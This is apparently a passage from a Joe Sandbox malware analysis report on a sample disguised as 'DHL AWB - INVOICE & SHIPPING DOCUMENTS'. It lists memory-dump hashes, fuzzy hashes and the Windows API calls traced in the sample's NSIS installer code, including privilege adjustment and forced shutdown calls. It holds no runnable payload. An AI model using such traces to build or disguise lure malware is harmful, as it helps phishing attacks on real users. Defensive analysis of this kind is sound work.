                                            • Opcode Fuzzy Hash: 321160616c07852eea260b34b67173b53481428bccb00c2627b3f7ecb1d1ce1d
                                            • Instruction Fuzzy Hash: 28114C30F082099BEF6E9B78C5503ED32A1AB99314F218539D40ADF255DBB5CDC28BD2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c5e36d80e6897d08525f2c6362b2eff941654681d725ccac44d7c3b4ad67b490
                                            • Instruction ID: efddcdc1a3500576e0b3101cd69665d9af61b45a7c17d50bbecc1fd92172f0e3
                                            • Opcode Fuzzy Hash: c5e36d80e6897d08525f2c6362b2eff941654681d725ccac44d7c3b4ad67b490
                                            • Instruction Fuzzy Hash: 2211E535B40255AFDF109BB8D80869E7FF6EB88350B14457AEA4AD7304EB398942C782
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4901f6c470c6b2c37815064c7ba0d7915996185d9735ad881f0c187690e4880b
                                            • Instruction ID: d81bfe1bd7b1a7ee82760aad2dc5fe1eaa8d0c6b7283c53c882ab71b90d1f765
                                            • Opcode Fuzzy Hash: 4901f6c470c6b2c37815064c7ba0d7915996185d9735ad881f0c187690e4880b
                                            • Instruction Fuzzy Hash: 2311523A7005148BDB45966CD814AAE77F7EBC8351F008539E505E7344DF6AAC028791
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b800b946f48170413698ae5adbc2949f538ae57ebe139d4ceca70cbe3d3d338e
                                            • Instruction ID: 4d70722ce1863d23512667cd5b619a128f2bf3a44c3f5c4b5fe6e711b6cf7489
                                            • Opcode Fuzzy Hash: b800b946f48170413698ae5adbc2949f538ae57ebe139d4ceca70cbe3d3d338e
                                            • Instruction Fuzzy Hash: F6117031A00255AFCF5AEFF894951EDBBB2EF49310B2404BAD505E7202EB75D9C28B91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4416468f355a1bcdb2ecb21308120d91df772876e9d16b313c96036f72baa55f
                                            • Instruction ID: 6078d5b84daace0bfbf2ce97b59c9898c4836fb1930662759ad2dd47511ba255
                                            • Opcode Fuzzy Hash: 4416468f355a1bcdb2ecb21308120d91df772876e9d16b313c96036f72baa55f
                                            • Instruction Fuzzy Hash: 7C21F2B5D01219AFCB00DF9AD884ACEFBB4FB48314F10852AE518A7300C3746A54CBA5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30052f0779d2762e3361bfd1d41b93f02f144b10aa91b6a6d525d259baf8ba29
                                            • Instruction ID: 8603d90f61ac2681b3f0cc40dea03f0b20ba55210cd7e4a18e940c824fe9a020
                                            • Opcode Fuzzy Hash: 30052f0779d2762e3361bfd1d41b93f02f144b10aa91b6a6d525d259baf8ba29
                                            • Instruction Fuzzy Hash: E3115972800249DFDB10DF9AD844BDEBBF5EB48310F14842AE914A7211C379A590DFA5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b9a78980a6b8dc8055a954eaec79fe1f5b8a2cb096dbf740457bede77d40f0b
                                            • Instruction ID: a2db7d1b324a5cae63acd793a3a436502cb52c4fbeb5b8ab0f0043e45b7d7f64
                                            • Opcode Fuzzy Hash: 5b9a78980a6b8dc8055a954eaec79fe1f5b8a2cb096dbf740457bede77d40f0b
                                            • Instruction Fuzzy Hash: 1D01D675B40211AFDF10ABB8D80869E7FF6EB48350F144436EA05D7340EB398841C7D2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: efc2261a112f8e9b73cfe5297b968a113aa5da805a5d425903b3fe61cecc8fbc
                                            • Instruction ID: a8bb60f6850f9316e99eb42836bce8880b91acd21677a569d9af341a830b7e37
                                            • Opcode Fuzzy Hash: efc2261a112f8e9b73cfe5297b968a113aa5da805a5d425903b3fe61cecc8fbc
                                            • Instruction Fuzzy Hash: D001D4367041545BDB0596BCD8256EF7BBBDBC9350F00453AE545EB340EF2AAC0283D6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eb29ec3699ce227934c34d2db26cb4ee5d00fa5692801fd0c47aae81e4766550
                                            • Instruction ID: ad0f086ff0f72f270189a796309e4392634f480f25ffca2fb60dacec43519e66
                                            • Opcode Fuzzy Hash: eb29ec3699ce227934c34d2db26cb4ee5d00fa5692801fd0c47aae81e4766550
                                            • Instruction Fuzzy Hash: 60012131E002159BCF59EFF894511DDBBF6EB49310B140479D505E7202EB75D9C18B95
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c014c93f422606aff4725325f39fda54fa24ac6ce252760e0a4b777493e7f61
                                            • Instruction ID: 1d1f501dfbb7c02560ce5fdadc37938da2e424520e89a2b0ce689c49aa4ee8d1
                                            • Opcode Fuzzy Hash: 9c014c93f422606aff4725325f39fda54fa24ac6ce252760e0a4b777493e7f61
                                            • Instruction Fuzzy Hash: C111B2B5D01219AFCB00DF9AD884BDEFBB4FB49354F50852AE518A7340C374A954CFA5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b7301ad158d12b9789d1ac6da6f9f018e6aca64d652513d7923f9fa43efa772
                                            • Instruction ID: 473527e5252728da269e06b4f0b4cb28340191baf62ff5387928f3e149adfc5d
                                            • Opcode Fuzzy Hash: 0b7301ad158d12b9789d1ac6da6f9f018e6aca64d652513d7923f9fa43efa772
                                            • Instruction Fuzzy Hash: 52F089367042186B8F059E98A8519EF7BEBEBC8360B004029F60593351DB724D119BB1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0e0dadbb2d2d813f8241cbadfa325ee431a3a51331f06ffad02d51f250ef50d
                                            • Instruction ID: 46dfbac2b6ba0de5bda497089347647ed4e8dbd8b257ce3431222e427f902e42
                                            • Opcode Fuzzy Hash: a0e0dadbb2d2d813f8241cbadfa325ee431a3a51331f06ffad02d51f250ef50d
                                            • Instruction Fuzzy Hash: FDE01A75E002299B8B54DAB989042EEBAF9AB48254F108475E909E3200F731CA508BA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 39c940a4946c3a9ff5ced907cfa9b817ba189cdc68a0df4f122942fac605af80
                                            • Instruction ID: d6bb2ef2e1144409885bbd4c923dc12163e7c1b54b62a8522c0a63ff5cf39e29
                                            • Opcode Fuzzy Hash: 39c940a4946c3a9ff5ced907cfa9b817ba189cdc68a0df4f122942fac605af80
                                            • Instruction Fuzzy Hash: FEE02031600100F78F2E9AE4D4411ECF363EAC5321B280076CA0656142C735D8C2D742
                                            APIs
                                            • SetErrorMode.KERNEL32(00008001), ref: 004033FB
                                            • GetVersionExA.KERNEL32(?), ref: 00403424
                                            • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                            • #17.COMCTL32(?,?,0000000A,?), ref: 00403541
                                            • OleInitialize.OLE32(00000000), ref: 00403548
                                            • SHGetFileInfoA.SHELL32(00429448,00000000,?,?,00000000,?,?,0000000A,?), ref: 00403566
                                            • GetCommandLineA.KERNEL32(0042E820,NSIS Error,?,?,0000000A,?), ref: 0040357B
                                            • CharNextA.USER32(00000000,00435000,00000020,00435000,00000000,?,?,0000000A,?), ref: 004035B5
                                            • GetTempPathA.KERNEL32(00000400,00436400,00000000,00000020,?,?,0000000A,?), ref: 004036AE
                                            • GetWindowsDirectoryA.KERNEL32(00436400,000003FB,?,?,0000000A,?), ref: 004036BF
                                            • lstrcatA.KERNEL32(00436400,\Temp,?,?,0000000A,?), ref: 004036CB
                                            • GetTempPathA.KERNEL32(000003FC,00436400,00436400,\Temp,?,?,0000000A,?), ref: 004036DF
                                            • lstrcatA.KERNEL32(00436400,Low,?,?,0000000A,?), ref: 004036E7
                                            • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,?,0000000A,?), ref: 004036F8
                                            • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,?,0000000A,?), ref: 00403700
                                            • DeleteFileA.KERNEL32(00436000,?,?,0000000A,?), ref: 00403714
                                            • OleUninitialize.OLE32(?,?,?,0000000A,?), ref: 004037BF
                                            • ExitProcess.KERNEL32 ref: 004037E0
                                            • lstrlenA.KERNEL32(00436400,00435000,00000000,?,?,?,0000000A,?), ref: 004037EF
                                            • wsprintfA.USER32 ref: 00403846
                                            • GetFileAttributesA.KERNEL32(00431400,00436400,00431400,?,?), ref: 00403878
                                            • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                            • SetCurrentDirectoryA.KERNEL32(00436400,00436400,00431400,?,?), ref: 004038B0
                                            • CopyFileA.KERNEL32(00436C00,00431400,00000001), ref: 004038C6
                                            • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                            • GetCurrentProcess.KERNEL32(?,?,?,0000000A,?), ref: 00403936
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                            • ExitProcess.KERNEL32 ref: 004039B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                            • String ID: "$A$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K~v$~nsu%X.tmp
                                            • API String ID: 2956269667-1158952377
                                            • Opcode ID: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                            • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                            • Opcode Fuzzy Hash: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                            • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                                            APIs
                                            • DeleteFileA.KERNEL32(?,?,767D3410,00436400,00435000), ref: 00405A78
                                            • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,767D3410,00436400,00435000), ref: 00405AC0
                                            • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,767D3410,00436400,00435000), ref: 00405AE1
                                            • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,767D3410,00436400,00435000), ref: 00405AE7
                                            • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,767D3410,00436400,00435000), ref: 00405AF8
                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                            • FindClose.KERNEL32(00000000), ref: 00405BB6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 2035342205-1173974218
                                            • Opcode ID: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                            • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                            • Opcode Fuzzy Hash: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                            • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                            • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                            • GlobalAlloc.KERNEL32(?,?), ref: 00404DA5
                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                            • SetWindowLongA.USER32(?,?,00405345), ref: 00404DD6
                                            • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404DE8
                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                            • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404E2E
                                            • DeleteObject.GDI32(00000110), ref: 00404E33
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                            • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                              • Part of subcall function 00404362: SendMessageA.USER32(?,?,00000001,00404192), ref: 00404370
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                            • GetWindowLongA.USER32(?,?), ref: 00404F76
                                            • SetWindowLongA.USER32(?,?,00000000), ref: 00404F84
                                            • ShowWindow.USER32(?,00000005), ref: 00404F94
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                            • SendMessageA.USER32(?,?,00000000,00000000), ref: 00405109
                                            • SendMessageA.USER32(?,00000420,00000000,?), ref: 0040512D
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                            • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                            • GlobalFree.KERNEL32(?), ref: 00405172
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                            • ShowWindow.USER32(?,00000000), ref: 0040531C
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                            • ShowWindow.USER32(00000000), ref: 0040532E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 2564846305-813528018
                                            • Opcode ID: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                            • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                            • Opcode Fuzzy Hash: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                            • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                            • GetClientRect.USER32(?,?), ref: 004055BA
                                            • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                            • ShowWindow.USER32(?,?), ref: 0040565D
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                              • Part of subcall function 00404362: SendMessageA.USER32(?,?,00000001,00404192), ref: 00404370
                                            • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                            • CreateThread.KERNEL32(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                            • CloseHandle.KERNEL32(00000000), ref: 004056E4
                                            • ShowWindow.USER32(00000000), ref: 00405707
                                            • ShowWindow.USER32(?,?), ref: 0040570E
                                            • ShowWindow.USER32(?), ref: 00405754
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                            • CreatePopupMenu.USER32 ref: 00405799
                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                            • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                            • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004057E7
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                            • OpenClipboard.USER32(00000000), ref: 00405833
                                            • EmptyClipboard.USER32 ref: 00405839
                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                            • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                            • CloseClipboard.USER32 ref: 0040588A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID:
                                            • API String ID: 590372296-0
                                            • Opcode ID: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                            • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                            • Opcode Fuzzy Hash: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                            • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                            • ShowWindow.USER32(?), ref: 00403E8F
                                            • GetWindowLongA.USER32(?,?), ref: 00403EA1
                                            • ShowWindow.USER32(?,?), ref: 00403EBA
                                            • DestroyWindow.USER32 ref: 00403ECE
                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                            • GetDlgItem.USER32(?,?), ref: 00403F06
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                            • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                            • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                            • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                            • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                            • ShowWindow.USER32(00000000,?), ref: 00404108
                                            • EnableWindow.USER32(?,?), ref: 0040411A
                                            • EnableWindow.USER32(?,?), ref: 00404135
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                            • EnableMenuItem.USER32(00000000), ref: 00404152
                                            • SendMessageA.USER32(?,?,00000000,00000001), ref: 0040416A
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                            • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                            • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                            • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                            • String ID:
                                            • API String ID: 1860320154-0
                                            • Opcode ID: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                            • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                            • Opcode Fuzzy Hash: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                            • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D
                                            APIs
                                              • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,?), ref: 004066C7
                                              • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                            • lstrcatA.KERNEL32(00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,767D3410,00436400,?,00435000,0000000A,?), ref: 00403B11
                                            • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,00435400,00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,767D3410), ref: 00403B86
                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                            • GetFileAttributesA.KERNEL32(0042DFC0,?,00435000,0000000A,?), ref: 00403BA4
                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403BED
                                              • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                            • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                            • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 00403C42
                                            • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                            • ShowWindow.USER32(00000005,00000000,?,00435000,0000000A,?), ref: 00403CAD
                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                            • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                            • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                            • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
